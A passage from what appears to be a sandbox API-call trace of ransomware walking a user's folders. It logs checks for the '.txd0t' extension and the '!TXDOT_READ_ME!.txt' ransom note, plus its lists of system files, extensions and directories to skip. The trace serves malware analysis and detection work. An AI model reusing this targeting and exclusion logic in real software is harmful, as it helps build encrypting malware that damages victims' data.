(in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.283] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.283] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.283] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x44269063, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44269063, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x44269063, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0090.283] StrCmpW (psz1="Everywhere.search-ms", psz2=".") returned 1 [0090.283] StrCmpW (psz1="Everywhere.search-ms", psz2="..") returned 1 [0090.283] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0090.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0090.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="Everywhere.search-ms", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms") returned="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" [0090.283] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0090.283] StrCmpW (psz1=".search-ms", psz2=".txd0t") returned -1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="bootsect.bak") returned 1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="iconcache.db") returned -1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="thumbs.db") returned -1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2=" ransomware ") returned 1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2=" ransom ") returned 1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="debug.txt") returned 1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="boot.ini") returned 1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="desktop.ini") returned 1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="autorun.inf") returned 1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="ntuser.dat") returned -1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="ntldr") returned -1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="ntdetect.com") returned -1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="bootfont.bin") returned 1 [0090.283] StrCmpIW (psz1="Everywhere.search-ms", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.283] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0090.283] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".search-ms") returned 0x0 [0090.283] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0090.283] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0090.284] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" [0090.284] SetEvent (hEvent=0x3fc) returned 1 [0090.287] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x44242e24, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44242e24, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x44242e24, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0090.288] StrCmpW (psz1="Indexed Locations.search-ms", psz2=".") returned 1 [0090.291] StrCmpW (psz1="Indexed Locations.search-ms", psz2="..") returned 1 [0090.295] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0090.295] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0090.295] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="Indexed Locations.search-ms", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms") returned="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" [0090.295] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0090.295] StrCmpW (psz1=".search-ms", psz2=".txd0t") returned -1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="bootsect.bak") returned 1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="iconcache.db") returned 1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="thumbs.db") returned -1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2=" ransomware ") returned 1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2=" ransom ") returned 1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="debug.txt") returned 1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="boot.ini") returned 1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="desktop.ini") returned 1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="autorun.inf") returned 1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="ntuser.dat") returned -1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="ntldr") returned -1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="ntdetect.com") returned -1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="bootfont.bin") returned 1 [0090.295] StrCmpIW (psz1="Indexed Locations.search-ms", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.295] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0090.296] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".search-ms") returned 0x0 [0090.296] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0090.296] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0090.296] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" [0090.296] SetEvent (hEvent=0x3fc) returned 1 [0090.298] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b71b019, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cAlternateFileName="WINRT-~1.SEA")) returned 1 [0090.298] StrCmpW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2=".") returned 1 [0090.298] StrCmpW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="..") returned 1 [0090.298] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0090.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0090.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" [0090.298] PathFindExtensionW (pszPath="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned=".searchconnector-ms" [0090.298] StrCmpW (psz1=".searchconnector-ms", psz2=".txd0t") returned -1 [0090.298] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="bootsect.bak") returned 1 [0090.298] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="iconcache.db") returned 1 [0090.298] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="thumbs.db") returned 1 [0090.298] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2=" ransomware ") returned 1 [0090.298] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2=" ransom ") returned 1 [0090.298] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="debug.txt") returned 1 [0090.298] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="boot.ini") returned 1 [0090.298] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="desktop.ini") returned 1 [0090.298] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="autorun.inf") returned 1 [0090.299] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="ntuser.dat") returned 1 [0090.299] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="ntldr") returned 1 [0090.299] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="ntdetect.com") returned 1 [0090.300] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="bootfont.bin") returned 1 [0090.300] StrCmpIW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.300] PathFindExtensionW (pszPath="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned=".searchconnector-ms" [0090.300] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".searchconnector-ms") returned 0x0 [0090.300] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0090.300] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0090.300] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" [0090.300] SetEvent (hEvent=0x408) returned 1 [0090.308] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2b71b019, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", cAlternateFileName="WINRT-~1.SEA")) returned 0 [0090.309] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0090.309] GetProcessHeap () returned 0xe30000 [0090.309] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.309] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0090.309] StrCmpW (psz1="SendTo", psz2=".") returned 1 [0090.309] StrCmpW (psz1="SendTo", psz2="..") returned 1 [0090.309] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0090.309] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0090.309] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0090.309] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0090.309] StrCmpW (psz1="Templates", psz2=".") returned 1 [0090.309] StrCmpW (psz1="Templates", psz2="..") returned 1 [0090.309] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x52e1f316, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0090.309] StrCmpW (psz1="Videos", psz2=".") returned 1 [0090.309] StrCmpW (psz1="Videos", psz2="..") returned 1 [0090.309] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.309] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.309] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Videos", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0090.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0090.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.309] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\boot\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="crypt_detect") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="cryptolocker") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="ransomware") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.310] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0090.310] GetProcessHeap () returned 0xe30000 [0090.310] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xec75a0 [0090.310] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.310] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\*") returned="C:\\Users\\FD1HVy\\Videos\\*" [0090.310] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x52e1f316, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20b0 [0090.310] StrCmpW (psz1=".", psz2=".") returned 0 [0090.310] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x52e1f316, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.310] StrCmpW (psz1="..", psz2=".") returned 1 [0090.310] StrCmpW (psz1="..", psz2="..") returned 0 [0090.310] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a6559f, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52a6559f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52a8b6c2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.310] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.311] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.311] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.311] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0090.311] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt" [0090.311] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.311] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.311] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.311] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827a210, ftCreationTime.dwHighDateTime=0x1d5e8fe, ftLastAccessTime.dwLowDateTime=0xb0bf66b0, ftLastAccessTime.dwHighDateTime=0x1d5e719, ftLastWriteTime.dwLowDateTime=0x52a6559f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18fa8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="42OnoQ2VRBixgPOTlYl.avi.txd0t", cAlternateFileName="42ONOQ~1.TXD")) returned 1 [0090.311] StrCmpW (psz1="42OnoQ2VRBixgPOTlYl.avi.txd0t", psz2=".") returned 1 [0090.311] StrCmpW (psz1="42OnoQ2VRBixgPOTlYl.avi.txd0t", psz2="..") returned 1 [0090.311] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.311] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0090.311] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="42OnoQ2VRBixgPOTlYl.avi.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t" [0090.311] PathFindExtensionW (pszPath="42OnoQ2VRBixgPOTlYl.avi.txd0t") returned=".txd0t" [0090.311] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.311] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.311] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.311] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.311] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: 